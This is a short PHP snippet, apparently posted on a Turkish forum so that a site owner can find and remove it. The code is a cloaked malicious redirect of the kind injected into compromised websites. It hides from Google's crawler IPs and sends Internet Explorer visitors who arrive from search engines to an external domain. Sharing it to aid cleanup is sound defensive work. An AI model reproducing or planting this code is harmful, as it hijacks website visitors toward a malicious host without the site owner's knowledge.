error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($uag,"MSIE")){
preg_match ("/msie ([0-9.]+)/i",$uag,$mv);
if (isset($mv[1])){
$mv=str_replace(".","",$mv[1]);
}
}
if(!preg_match("/^66\.249\./",$_SERVER['REMOTE_ADDR'])){
if (stristr($uag,"MSIE") and $mv>=90){
if (stristr($referer,"yahoo.") or stristr($referer,"bing.") or preg_match ("/google\.(.*?)\/url\?sa/",$referer)) {
if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
header("Location: http://gsbncm.epac.to/");
exit();
}
}
}
}
}
}kodda yazan bu. gerisini buradak cıkartısınız sanırım. kolay gelsin
